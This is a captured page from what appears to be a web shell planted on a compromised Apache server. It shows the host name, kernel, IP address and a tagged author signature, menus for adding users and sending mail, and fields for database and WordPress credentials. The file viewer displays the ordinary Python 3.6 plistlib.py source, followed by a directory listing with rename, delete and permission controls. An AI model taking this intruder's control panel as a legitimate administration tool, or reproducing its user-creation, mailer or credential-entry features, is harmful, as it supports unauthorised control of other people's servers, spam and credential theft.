System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib64
/
python3.6
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
plistlib.py
r"""plistlib.py -- a tool to generate and parse MacOSX .plist files. The property list (.plist) file format is a simple XML pickle supporting basic object types, like dictionaries, lists, numbers and strings. Usually the top level object is a dictionary. To write out a plist file, use the dump(value, file) function. 'value' is the top level object, 'file' is a (writable) file object. To parse a plist from a file, use the load(file) function, with a (readable) file object as the only argument. It returns the top level object (again, usually a dictionary). To work with plist data in bytes objects, you can use loads() and dumps(). Values can be strings, integers, floats, booleans, tuples, lists, dictionaries (but only with string keys), Data, bytes, bytearray, or datetime.datetime objects. Generate Plist example: pl = dict( aString = "Doodah", aList = ["A", "B", 12, 32.1, [1, 2, 3]], aFloat = 0.1, anInt = 728, aDict = dict( anotherString = "<hello & hi there!>", aUnicodeValue = "M\xe4ssig, Ma\xdf", aTrueValue = True, aFalseValue = False, ), someData = b"<binary gunk>", someMoreData = b"<lots of binary gunk>" * 10, aDate = datetime.datetime.fromtimestamp(time.mktime(time.gmtime())), ) with open(fileName, 'wb') as fp: dump(pl, fp) Parse Plist example: with open(fileName, 'rb') as fp: pl = load(fp) print(pl["aKey"]) """ __all__ = [ "readPlist", "writePlist", "readPlistFromBytes", "writePlistToBytes", "Plist", "Data", "Dict", "InvalidFileException", "FMT_XML", "FMT_BINARY", "load", "dump", "loads", "dumps" ] import binascii import codecs import contextlib import datetime import enum from io import BytesIO import itertools import os import re import struct from warnings import warn from xml.parsers.expat import ParserCreate PlistFormat = enum.Enum('PlistFormat', 'FMT_XML FMT_BINARY', module=__name__) globals().update(PlistFormat.__members__) # # # Deprecated functionality # # class _InternalDict(dict): # This class is needed while Dict is scheduled for deprecation: # we only need to warn when a *user* instantiates Dict or when # the "attribute notation for dict keys" is used. __slots__ = () def __getattr__(self, attr): try: value = self[attr] except KeyError: raise AttributeError(attr) warn("Attribute access from plist dicts is deprecated, use d[key] " "notation instead", DeprecationWarning, 2) return value def __setattr__(self, attr, value): warn("Attribute access from plist dicts is deprecated, use d[key] " "notation instead", DeprecationWarning, 2) self[attr] = value def __delattr__(self, attr): try: del self[attr] except KeyError: raise AttributeError(attr) warn("Attribute access from plist dicts is deprecated, use d[key] " "notation instead", DeprecationWarning, 2) class Dict(_InternalDict): def __init__(self, **kwargs): warn("The plistlib.Dict class is deprecated, use builtin dict instead", DeprecationWarning, 2) super().__init__(**kwargs) @contextlib.contextmanager def _maybe_open(pathOrFile, mode): if isinstance(pathOrFile, str): with open(pathOrFile, mode) as fp: yield fp else: yield pathOrFile class Plist(_InternalDict): """This class has been deprecated. Use dump() and load() functions instead, together with regular dict objects. """ def __init__(self, **kwargs): warn("The Plist class is deprecated, use the load() and " "dump() functions instead", DeprecationWarning, 2) super().__init__(**kwargs) @classmethod def fromFile(cls, pathOrFile): """Deprecated. Use the load() function instead.""" with _maybe_open(pathOrFile, 'rb') as fp: value = load(fp) plist = cls() plist.update(value) return plist def write(self, pathOrFile): """Deprecated. Use the dump() function instead.""" with _maybe_open(pathOrFile, 'wb') as fp: dump(self, fp) def readPlist(pathOrFile): """ Read a .plist from a path or file. pathOrFile should either be a file name, or a readable binary file object. This function is deprecated, use load instead. """ warn("The readPlist function is deprecated, use load() instead", DeprecationWarning, 2) with _maybe_open(pathOrFile, 'rb') as fp: return load(fp, fmt=None, use_builtin_types=False, dict_type=_InternalDict) def writePlist(value, pathOrFile): """ Write 'value' to a .plist file. 'pathOrFile' may either be a file name or a (writable) file object. This function is deprecated, use dump instead. """ warn("The writePlist function is deprecated, use dump() instead", DeprecationWarning, 2) with _maybe_open(pathOrFile, 'wb') as fp: dump(value, fp, fmt=FMT_XML, sort_keys=True, skipkeys=False) def readPlistFromBytes(data): """ Read a plist data from a bytes object. Return the root object. This function is deprecated, use loads instead. """ warn("The readPlistFromBytes function is deprecated, use loads() instead", DeprecationWarning, 2) return load(BytesIO(data), fmt=None, use_builtin_types=False, dict_type=_InternalDict) def writePlistToBytes(value): """ Return 'value' as a plist-formatted bytes object. This function is deprecated, use dumps instead. """ warn("The writePlistToBytes function is deprecated, use dumps() instead", DeprecationWarning, 2) f = BytesIO() dump(value, f, fmt=FMT_XML, sort_keys=True, skipkeys=False) return f.getvalue() class Data: """ Wrapper for binary data. This class is deprecated, use a bytes object instead. """ def __init__(self, data): if not isinstance(data, bytes): raise TypeError("data must be as bytes") self.data = data @classmethod def fromBase64(cls, data): # base64.decodebytes just calls binascii.a2b_base64; # it seems overkill to use both base64 and binascii. return cls(_decode_base64(data)) def asBase64(self, maxlinelength=76): return _encode_base64(self.data, maxlinelength) def __eq__(self, other): if isinstance(other, self.__class__): return self.data == other.data elif isinstance(other, bytes): return self.data == other else: return NotImplemented def __repr__(self): return "%s(%s)" % (self.__class__.__name__, repr(self.data)) # # # End of deprecated functionality # # # # XML support # # XML 'header' PLISTHEADER = b"""\ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> """ # Regex to find any control chars, except for \t \n and \r _controlCharPat = re.compile( r"[\x00\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0e\x0f" r"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f]") def _encode_base64(s, maxlinelength=76): # copied from base64.encodebytes(), with added maxlinelength argument maxbinsize = (maxlinelength//4)*3 pieces = [] for i in range(0, len(s), maxbinsize): chunk = s[i : i + maxbinsize] pieces.append(binascii.b2a_base64(chunk)) return b''.join(pieces) def _decode_base64(s): if isinstance(s, str): return binascii.a2b_base64(s.encode("utf-8")) else: return binascii.a2b_base64(s) # Contents should conform to a subset of ISO 8601 # (in particular, YYYY '-' MM '-' DD 'T' HH ':' MM ':' SS 'Z'. Smaller units # may be omitted with # a loss of precision) _dateParser = re.compile(r"(?P<year>\d\d\d\d)(?:-(?P<month>\d\d)(?:-(?P<day>\d\d)(?:T(?P<hour>\d\d)(?::(?P<minute>\d\d)(?::(?P<second>\d\d))?)?)?)?)?Z", re.ASCII) def _date_from_string(s): order = ('year', 'month', 'day', 'hour', 'minute', 'second') gd = _dateParser.match(s).groupdict() lst = [] for key in order: val = gd[key] if val is None: break lst.append(int(val)) return datetime.datetime(*lst) def _date_to_string(d): return '%04d-%02d-%02dT%02d:%02d:%02dZ' % ( d.year, d.month, d.day, d.hour, d.minute, d.second ) def _escape(text): m = _controlCharPat.search(text) if m is not None: raise ValueError("strings can't contains control characters; " "use bytes instead") text = text.replace("\r\n", "\n") # convert DOS line endings text = text.replace("\r", "\n") # convert Mac line endings text = text.replace("&", "&") # escape '&' text = text.replace("<", "<") # escape '<' text = text.replace(">", ">") # escape '>' return text class _PlistParser: def __init__(self, use_builtin_types, dict_type): self.stack = [] self.current_key = None self.root = None self._use_builtin_types = use_builtin_types self._dict_type = dict_type def parse(self, fileobj): self.parser = ParserCreate() self.parser.StartElementHandler = self.handle_begin_element self.parser.EndElementHandler = self.handle_end_element self.parser.CharacterDataHandler = self.handle_data self.parser.ParseFile(fileobj) return self.root def handle_begin_element(self, element, attrs): self.data = [] handler = getattr(self, "begin_" + element, None) if handler is not None: handler(attrs) def handle_end_element(self, element): handler = getattr(self, "end_" + element, None) if handler is not None: handler() def handle_data(self, data): self.data.append(data) def add_object(self, value): if self.current_key is not None: if not isinstance(self.stack[-1], type({})): raise ValueError("unexpected element at line %d" % self.parser.CurrentLineNumber) self.stack[-1][self.current_key] = value self.current_key = None elif not self.stack: # this is the root object self.root = value else: if not isinstance(self.stack[-1], type([])): raise ValueError("unexpected element at line %d" % self.parser.CurrentLineNumber) self.stack[-1].append(value) def get_data(self): data = ''.join(self.data) self.data = [] return data # element handlers def begin_dict(self, attrs): d = self._dict_type() self.add_object(d) self.stack.append(d) def end_dict(self): if self.current_key: raise ValueError("missing value for key '%s' at line %d" % (self.current_key,self.parser.CurrentLineNumber)) self.stack.pop() def end_key(self): if self.current_key or not isinstance(self.stack[-1], type({})): raise ValueError("unexpected key at line %d" % self.parser.CurrentLineNumber) self.current_key = self.get_data() def begin_array(self, attrs): a = [] self.add_object(a) self.stack.append(a) def end_array(self): self.stack.pop() def end_true(self): self.add_object(True) def end_false(self): self.add_object(False) def end_integer(self): self.add_object(int(self.get_data())) def end_real(self): self.add_object(float(self.get_data())) def end_string(self): self.add_object(self.get_data()) def end_data(self): if self._use_builtin_types: self.add_object(_decode_base64(self.get_data())) else: self.add_object(Data.fromBase64(self.get_data())) def end_date(self): self.add_object(_date_from_string(self.get_data())) class _DumbXMLWriter: def __init__(self, file, indent_level=0, indent="\t"): self.file = file self.stack = [] self._indent_level = indent_level self.indent = indent def begin_element(self, element): self.stack.append(element) self.writeln("<%s>" % element) self._indent_level += 1 def end_element(self, element): assert self._indent_level > 0 assert self.stack.pop() == element self._indent_level -= 1 self.writeln("</%s>" % element) def simple_element(self, element, value=None): if value is not None: value = _escape(value) self.writeln("<%s>%s</%s>" % (element, value, element)) else: self.writeln("<%s/>" % element) def writeln(self, line): if line: # plist has fixed encoding of utf-8 # XXX: is this test needed? if isinstance(line, str): line = line.encode('utf-8') self.file.write(self._indent_level * self.indent) self.file.write(line) self.file.write(b'\n') class _PlistWriter(_DumbXMLWriter): def __init__( self, file, indent_level=0, indent=b"\t", writeHeader=1, sort_keys=True, skipkeys=False): if writeHeader: file.write(PLISTHEADER) _DumbXMLWriter.__init__(self, file, indent_level, indent) self._sort_keys = sort_keys self._skipkeys = skipkeys def write(self, value): self.writeln("<plist version=\"1.0\">") self.write_value(value) self.writeln("</plist>") def write_value(self, value): if isinstance(value, str): self.simple_element("string", value) elif value is True: self.simple_element("true") elif value is False: self.simple_element("false") elif isinstance(value, int): if -1 << 63 <= value < 1 << 64: self.simple_element("integer", "%d" % value) else: raise OverflowError(value) elif isinstance(value, float): self.simple_element("real", repr(value)) elif isinstance(value, dict): self.write_dict(value) elif isinstance(value, Data): self.write_data(value) elif isinstance(value, (bytes, bytearray)): self.write_bytes(value) elif isinstance(value, datetime.datetime): self.simple_element("date", _date_to_string(value)) elif isinstance(value, (tuple, list)): self.write_array(value) else: raise TypeError("unsupported type: %s" % type(value)) def write_data(self, data): self.write_bytes(data.data) def write_bytes(self, data): self.begin_element("data") self._indent_level -= 1 maxlinelength = max( 16, 76 - len(self.indent.replace(b"\t", b" " * 8) * self._indent_level)) for line in _encode_base64(data, maxlinelength).split(b"\n"): if line: self.writeln(line) self._indent_level += 1 self.end_element("data") def write_dict(self, d): if d: self.begin_element("dict") if self._sort_keys: items = sorted(d.items()) else: items = d.items() for key, value in items: if not isinstance(key, str): if self._skipkeys: continue raise TypeError("keys must be strings") self.simple_element("key", key) self.write_value(value) self.end_element("dict") else: self.simple_element("dict") def write_array(self, array): if array: self.begin_element("array") for value in array: self.write_value(value) self.end_element("array") else: self.simple_element("array") def _is_fmt_xml(header): prefixes = (b'<?xml', b'<plist') for pfx in prefixes: if header.startswith(pfx): return True # Also check for alternative XML encodings, this is slightly # overkill because the Apple tools (and plistlib) will not # generate files with these encodings. for bom, encoding in ( (codecs.BOM_UTF8, "utf-8"), (codecs.BOM_UTF16_BE, "utf-16-be"), (codecs.BOM_UTF16_LE, "utf-16-le"), # expat does not support utf-32 #(codecs.BOM_UTF32_BE, "utf-32-be"), #(codecs.BOM_UTF32_LE, "utf-32-le"), ): if not header.startswith(bom): continue for start in prefixes: prefix = bom + start.decode('ascii').encode(encoding) if header[:len(prefix)] == prefix: return True return False # # Binary Plist # class InvalidFileException (ValueError): def __init__(self, message="Invalid file"): ValueError.__init__(self, message) _BINARY_FORMAT = {1: 'B', 2: 'H', 4: 'L', 8: 'Q'} _undefined = object() class _BinaryPlistParser: """ Read or write a binary plist file, following the description of the binary format. Raise InvalidFileException in case of error, otherwise return the root object. see also: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c """ def __init__(self, use_builtin_types, dict_type): self._use_builtin_types = use_builtin_types self._dict_type = dict_type def parse(self, fp): try: # The basic file format: # HEADER # object... # refid->offset... # TRAILER self._fp = fp self._fp.seek(-32, os.SEEK_END) trailer = self._fp.read(32) if len(trailer) != 32: raise InvalidFileException() ( offset_size, self._ref_size, num_objects, top_object, offset_table_offset ) = struct.unpack('>6xBBQQQ', trailer) self._fp.seek(offset_table_offset) self._object_offsets = self._read_ints(num_objects, offset_size) self._objects = [_undefined] * num_objects return self._read_object(top_object) except (OSError, IndexError, struct.error, OverflowError, ValueError): raise InvalidFileException() def _get_size(self, tokenL): """ return the size of the next object.""" if tokenL == 0xF: m = self._fp.read(1)[0] & 0x3 s = 1 << m f = '>' + _BINARY_FORMAT[s] return struct.unpack(f, self._fp.read(s))[0] return tokenL def _read_ints(self, n, size): data = self._fp.read(size * n) if size in _BINARY_FORMAT: return struct.unpack(f'>{n}{_BINARY_FORMAT[size]}', data) else: if not size or len(data) != size * n: raise InvalidFileException() return tuple(int.from_bytes(data[i: i + size], 'big') for i in range(0, size * n, size)) def _read_refs(self, n): return self._read_ints(n, self._ref_size) def _read_object(self, ref): """ read the object by reference. May recursively read sub-objects (content of an array/dict/set) """ result = self._objects[ref] if result is not _undefined: return result offset = self._object_offsets[ref] self._fp.seek(offset) token = self._fp.read(1)[0] tokenH, tokenL = token & 0xF0, token & 0x0F if token == 0x00: result = None elif token == 0x08: result = False elif token == 0x09: result = True # The referenced source code also mentions URL (0x0c, 0x0d) and # UUID (0x0e), but neither can be generated using the Cocoa libraries. elif token == 0x0f: result = b'' elif tokenH == 0x10: # int result = int.from_bytes(self._fp.read(1 << tokenL), 'big', signed=tokenL >= 3) elif token == 0x22: # real result = struct.unpack('>f', self._fp.read(4))[0] elif token == 0x23: # real result = struct.unpack('>d', self._fp.read(8))[0] elif token == 0x33: # date f = struct.unpack('>d', self._fp.read(8))[0] # timestamp 0 of binary plists corresponds to 1/1/2001 # (year of Mac OS X 10.0), instead of 1/1/1970. result = (datetime.datetime(2001, 1, 1) + datetime.timedelta(seconds=f)) elif tokenH == 0x40: # data s = self._get_size(tokenL) result = self._fp.read(s) if len(result) != s: raise InvalidFileException() if not self._use_builtin_types: result = Data(result) elif tokenH == 0x50: # ascii string s = self._get_size(tokenL) data = self._fp.read(s) if len(data) != s: raise InvalidFileException() result = data.decode('ascii') elif tokenH == 0x60: # unicode string s = self._get_size(tokenL) * 2 data = self._fp.read(s) if len(data) != s: raise InvalidFileException() result = data.decode('utf-16be') # tokenH == 0x80 is documented as 'UID' and appears to be used for # keyed-archiving, not in plists. elif tokenH == 0xA0: # array s = self._get_size(tokenL) obj_refs = self._read_refs(s) result = [] self._objects[ref] = result result.extend(self._read_object(x) for x in obj_refs) # tokenH == 0xB0 is documented as 'ordset', but is not actually # implemented in the Apple reference code. # tokenH == 0xC0 is documented as 'set', but sets cannot be used in # plists. elif tokenH == 0xD0: # dict s = self._get_size(tokenL) key_refs = self._read_refs(s) obj_refs = self._read_refs(s) result = self._dict_type() self._objects[ref] = result try: for k, o in zip(key_refs, obj_refs): result[self._read_object(k)] = self._read_object(o) except TypeError: raise InvalidFileException() else: raise InvalidFileException() self._objects[ref] = result return result def _count_to_size(count): if count < 1 << 8: return 1 elif count < 1 << 16: return 2 elif count << 1 << 32: return 4 else: return 8 _scalars = (str, int, float, datetime.datetime, bytes) class _BinaryPlistWriter (object): def __init__(self, fp, sort_keys, skipkeys): self._fp = fp self._sort_keys = sort_keys self._skipkeys = skipkeys def write(self, value): # Flattened object list: self._objlist = [] # Mappings from object->objectid # First dict has (type(object), object) as the key, # second dict is used when object is not hashable and # has id(object) as the key. self._objtable = {} self._objidtable = {} # Create list of all objects in the plist self._flatten(value) # Size of object references in serialized containers # depends on the number of objects in the plist. num_objects = len(self._objlist) self._object_offsets = [0]*num_objects self._ref_size = _count_to_size(num_objects) self._ref_format = _BINARY_FORMAT[self._ref_size] # Write file header self._fp.write(b'bplist00') # Write object list for obj in self._objlist: self._write_object(obj) # Write refnum->object offset table top_object = self._getrefnum(value) offset_table_offset = self._fp.tell() offset_size = _count_to_size(offset_table_offset) offset_format = '>' + _BINARY_FORMAT[offset_size] * num_objects self._fp.write(struct.pack(offset_format, *self._object_offsets)) # Write trailer sort_version = 0 trailer = ( sort_version, offset_size, self._ref_size, num_objects, top_object, offset_table_offset ) self._fp.write(struct.pack('>5xBBBQQQ', *trailer)) def _flatten(self, value): # First check if the object is in the object table, not used for # containers to ensure that two subcontainers with the same contents # will be serialized as distinct values. if isinstance(value, _scalars): if (type(value), value) in self._objtable: return elif isinstance(value, Data): if (type(value.data), value.data) in self._objtable: return elif id(value) in self._objidtable: return # Add to objectreference map refnum = len(self._objlist) self._objlist.append(value) if isinstance(value, _scalars): self._objtable[(type(value), value)] = refnum elif isinstance(value, Data): self._objtable[(type(value.data), value.data)] = refnum else: self._objidtable[id(value)] = refnum # And finally recurse into containers if isinstance(value, dict): keys = [] values = [] items = value.items() if self._sort_keys: items = sorted(items) for k, v in items: if not isinstance(k, str): if self._skipkeys: continue raise TypeError("keys must be strings") keys.append(k) values.append(v) for o in itertools.chain(keys, values): self._flatten(o) elif isinstance(value, (list, tuple)): for o in value: self._flatten(o) def _getrefnum(self, value): if isinstance(value, _scalars): return self._objtable[(type(value), value)] elif isinstance(value, Data): return self._objtable[(type(value.data), value.data)] else: return self._objidtable[id(value)] def _write_size(self, token, size): if size < 15: self._fp.write(struct.pack('>B', token | size)) elif size < 1 << 8: self._fp.write(struct.pack('>BBB', token | 0xF, 0x10, size)) elif size < 1 << 16: self._fp.write(struct.pack('>BBH', token | 0xF, 0x11, size)) elif size < 1 << 32: self._fp.write(struct.pack('>BBL', token | 0xF, 0x12, size)) else: self._fp.write(struct.pack('>BBQ', token | 0xF, 0x13, size)) def _write_object(self, value): ref = self._getrefnum(value) self._object_offsets[ref] = self._fp.tell() if value is None: self._fp.write(b'\x00') elif value is False: self._fp.write(b'\x08') elif value is True: self._fp.write(b'\x09') elif isinstance(value, int): if value < 0: try: self._fp.write(struct.pack('>Bq', 0x13, value)) except struct.error: raise OverflowError(value) from None elif value < 1 << 8: self._fp.write(struct.pack('>BB', 0x10, value)) elif value < 1 << 16: self._fp.write(struct.pack('>BH', 0x11, value)) elif value < 1 << 32: self._fp.write(struct.pack('>BL', 0x12, value)) elif value < 1 << 63: self._fp.write(struct.pack('>BQ', 0x13, value)) elif value < 1 << 64: self._fp.write(b'\x14' + value.to_bytes(16, 'big', signed=True)) else: raise OverflowError(value) elif isinstance(value, float): self._fp.write(struct.pack('>Bd', 0x23, value)) elif isinstance(value, datetime.datetime): f = (value - datetime.datetime(2001, 1, 1)).total_seconds() self._fp.write(struct.pack('>Bd', 0x33, f)) elif isinstance(value, Data): self._write_size(0x40, len(value.data)) self._fp.write(value.data) elif isinstance(value, (bytes, bytearray)): self._write_size(0x40, len(value)) self._fp.write(value) elif isinstance(value, str): try: t = value.encode('ascii') self._write_size(0x50, len(value)) except UnicodeEncodeError: t = value.encode('utf-16be') self._write_size(0x60, len(t) // 2) self._fp.write(t) elif isinstance(value, (list, tuple)): refs = [self._getrefnum(o) for o in value] s = len(refs) self._write_size(0xA0, s) self._fp.write(struct.pack('>' + self._ref_format * s, *refs)) elif isinstance(value, dict): keyRefs, valRefs = [], [] if self._sort_keys: rootItems = sorted(value.items()) else: rootItems = value.items() for k, v in rootItems: if not isinstance(k, str): if self._skipkeys: continue raise TypeError("keys must be strings") keyRefs.append(self._getrefnum(k)) valRefs.append(self._getrefnum(v)) s = len(keyRefs) self._write_size(0xD0, s) self._fp.write(struct.pack('>' + self._ref_format * s, *keyRefs)) self._fp.write(struct.pack('>' + self._ref_format * s, *valRefs)) else: raise TypeError(value) def _is_fmt_binary(header): return header[:8] == b'bplist00' # # Generic bits # _FORMATS={ FMT_XML: dict( detect=_is_fmt_xml, parser=_PlistParser, writer=_PlistWriter, ), FMT_BINARY: dict( detect=_is_fmt_binary, parser=_BinaryPlistParser, writer=_BinaryPlistWriter, ) } def load(fp, *, fmt=None, use_builtin_types=True, dict_type=dict): """Read a .plist file. 'fp' should be (readable) file object. Return the unpacked root object (which usually is a dictionary). """ if fmt is None: header = fp.read(32) fp.seek(0) for info in _FORMATS.values(): if info['detect'](header): P = info['parser'] break else: raise InvalidFileException() else: P = _FORMATS[fmt]['parser'] p = P(use_builtin_types=use_builtin_types, dict_type=dict_type) return p.parse(fp) def loads(value, *, fmt=None, use_builtin_types=True, dict_type=dict): """Read a .plist file from a bytes object. Return the unpacked root object (which usually is a dictionary). """ fp = BytesIO(value) return load( fp, fmt=fmt, use_builtin_types=use_builtin_types, dict_type=dict_type) def dump(value, fp, *, fmt=FMT_XML, sort_keys=True, skipkeys=False): """Write 'value' to a .plist file. 'fp' should be a (writable) file object. """ if fmt not in _FORMATS: raise ValueError("Unsupported format: %r"%(fmt,)) writer = _FORMATS[fmt]["writer"](fp, sort_keys=sort_keys, skipkeys=skipkeys) writer.write(value) def dumps(value, *, fmt=FMT_XML, skipkeys=False, sort_keys=True): """Return a bytes object with the contents for a .plist file. """ fp = BytesIO() dump(value, fp, fmt=fmt, skipkeys=skipkeys, sort_keys=sort_keys) return fp.getvalue()
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
..
DIR
-
dr-xr-xr-x
2025-10-21 10:57:26
__pycache__
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
asyncio
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
collections
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
concurrent
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
config-3.6m-x86_64-linux-gnu
DIR
-
drwxr-xr-x
2025-08-28 10:58:34
ctypes
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
curses
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
dbm
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
distutils
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
email
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
encodings
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
ensurepip
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
html
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
http
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
importlib
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
json
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
lib-dynload
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
lib2to3
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
logging
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
multiprocessing
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
pydoc_data
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
site-packages
DIR
-
drwxr-xr-x
2025-10-21 10:57:26
sqlite3
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
test
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
unittest
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
urllib
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
venv
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
wsgiref
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
xml
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
xmlrpc
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
__future__.py
text/plain
4.73 KB
-rw-r--r--
2018-12-23 09:37:14
__phello__.foo.py
text/plain
64 B
-rw-r--r--
2018-12-23 09:37:14
_bootlocale.py
text/plain
1.27 KB
-rw-r--r--
2018-12-23 09:37:14
_collections_abc.py
text/x-python
25.77 KB
-rw-r--r--
2018-12-23 09:37:14
_compat_pickle.py
text/plain
8.54 KB
-rw-r--r--
2018-12-23 09:37:14
_compression.py
text/plain
5.21 KB
-rw-r--r--
2018-12-23 09:37:14
_dummy_thread.py
text/plain
5 KB
-rw-r--r--
2018-12-23 09:37:14
_markupbase.py
text/plain
14.26 KB
-rw-r--r--
2018-12-23 09:37:14
_osx_support.py
text/plain
18.69 KB
-rw-r--r--
2018-12-23 09:37:14
_pydecimal.py
text/x-python
224.83 KB
-rw-r--r--
2018-12-23 09:37:14
_pyio.py
text/x-python
86.03 KB
-rw-r--r--
2018-12-23 09:37:14
_sitebuiltins.py
text/plain
3.04 KB
-rw-r--r--
2018-12-23 09:37:14
_strptime.py
text/x-python
24.17 KB
-rw-r--r--
2018-12-23 09:37:14
_sysconfigdata_dm_linux_x86_64-linux-gnu.py
text/plain
29.48 KB
-rw-r--r--
2025-08-26 09:00:17
_sysconfigdata_m_linux_x86_64-linux-gnu.py
text/plain
29.66 KB
-rw-r--r--
2025-08-26 09:06:58
_threading_local.py
text/x-python
7.04 KB
-rw-r--r--
2018-12-23 09:37:14
_weakrefset.py
text/x-python
5.57 KB
-rw-r--r--
2018-12-23 09:37:14
abc.py
text/x-python
8.52 KB
-rw-r--r--
2018-12-23 09:37:14
aifc.py
text/x-python
31.69 KB
-rw-r--r--
2018-12-23 09:37:14
antigravity.py
text/x-python
477 B
-rw-r--r--
2018-12-23 09:37:14
argparse.py
text/x-python
88.25 KB
-rw-r--r--
2018-12-23 09:37:14
ast.py
text/x-python
11.88 KB
-rw-r--r--
2018-12-23 09:37:14
asynchat.py
text/x-python
11.06 KB
-rw-r--r--
2018-12-23 09:37:14
asyncore.py
text/x-python
19.69 KB
-rw-r--r--
2018-12-23 09:37:14
base64.py
text/plain
19.91 KB
-rwxr-xr-x
2018-12-23 09:37:14
bdb.py
text/x-python
23 KB
-rw-r--r--
2018-12-23 09:37:14
binhex.py
text/plain
13.63 KB
-rw-r--r--
2018-12-23 09:37:14
bisect.py
text/plain
2.53 KB
-rw-r--r--
2018-12-23 09:37:14
bz2.py
text/x-python
12.19 KB
-rw-r--r--
2018-12-23 09:37:14
cProfile.py
text/plain
5.25 KB
-rwxr-xr-x
2018-12-23 09:37:14
calendar.py
text/x-python
22.67 KB
-rw-r--r--
2018-12-23 09:37:14
cgi.py
text/plain
36.35 KB
-rwxr-xr-x
2025-08-26 08:58:55
cgitb.py
text/plain
11.74 KB
-rw-r--r--
2018-12-23 09:37:14
chunk.py
text/plain
5.3 KB
-rw-r--r--
2018-12-23 09:37:14
cmd.py
text/plain
14.51 KB
-rw-r--r--
2018-12-23 09:37:14
code.py
text/x-python
10.37 KB
-rw-r--r--
2018-12-23 09:37:14
codecs.py
text/plain
35.43 KB
-rw-r--r--
2018-12-23 09:37:14
codeop.py
text/x-python
5.85 KB
-rw-r--r--
2018-12-23 09:37:14
colorsys.py
text/plain
3.97 KB
-rw-r--r--
2018-12-23 09:37:14
compileall.py
text/x-python
11.84 KB
-rw-r--r--
2018-12-23 09:37:14
configparser.py
text/x-python
52.34 KB
-rw-r--r--
2018-12-23 09:37:14
contextlib.py
text/x-python
12.85 KB
-rw-r--r--
2018-12-23 09:37:14
copy.py
text/x-python
8.61 KB
-rw-r--r--
2018-12-23 09:37:14
copyreg.py
text/plain
6.84 KB
-rw-r--r--
2018-12-23 09:37:14
crypt.py
text/x-python
1.82 KB
-rw-r--r--
2018-12-23 09:37:14
csv.py
text/x-python
15.8 KB
-rw-r--r--
2018-12-23 09:37:14
datetime.py
text/plain
80.11 KB
-rw-r--r--
2018-12-23 09:37:14
decimal.py
text/x-python
320 B
-rw-r--r--
2018-12-23 09:37:14
difflib.py
text/x-python
82.4 KB
-rw-r--r--
2018-12-23 09:37:14
dis.py
text/x-python
17.71 KB
-rw-r--r--
2018-12-23 09:37:14
doctest.py
text/x-python
101.94 KB
-rw-r--r--
2018-12-23 09:37:14
dummy_threading.py
text/x-python
2.75 KB
-rw-r--r--
2018-12-23 09:37:14
enum.py
text/x-python
32.82 KB
-rw-r--r--
2018-12-23 09:37:14
filecmp.py
text/x-python
9.6 KB
-rw-r--r--
2018-12-23 09:37:14
fileinput.py
text/plain
14.13 KB
-rw-r--r--
2018-12-23 09:37:14
fnmatch.py
text/plain
3.09 KB
-rw-r--r--
2018-12-23 09:37:14
formatter.py
text/plain
14.79 KB
-rw-r--r--
2018-12-23 09:37:14
fractions.py
text/x-python
23.08 KB
-rw-r--r--
2018-12-23 09:37:14
ftplib.py
text/x-python
34.78 KB
-rw-r--r--
2025-08-26 08:58:55
functools.py
text/x-python
30.61 KB
-rw-r--r--
2018-12-23 09:37:14
genericpath.py
text/plain
4.91 KB
-rw-r--r--
2025-08-26 08:58:55
getopt.py
text/plain
7.31 KB
-rw-r--r--
2018-12-23 09:37:14
getpass.py
text/plain
5.85 KB
-rw-r--r--
2018-12-23 09:37:14
gettext.py
text/x-python
21.03 KB
-rw-r--r--
2018-12-23 09:37:14
glob.py
text/plain
5.51 KB
-rw-r--r--
2018-12-23 09:37:14
gzip.py
text/plain
19.86 KB
-rw-r--r--
2018-12-23 09:37:14
hashlib.py
text/x-python
8.59 KB
-rw-r--r--
2025-08-26 08:58:55
heapq.py
text/plain
22.39 KB
-rw-r--r--
2018-12-23 09:37:14
hmac.py
text/x-python
6.23 KB
-rw-r--r--
2025-08-26 08:58:55
imaplib.py
text/x-python
52.05 KB
-rw-r--r--
2018-12-23 09:37:14
imghdr.py
text/x-python
3.71 KB
-rw-r--r--
2018-12-23 09:37:14
imp.py
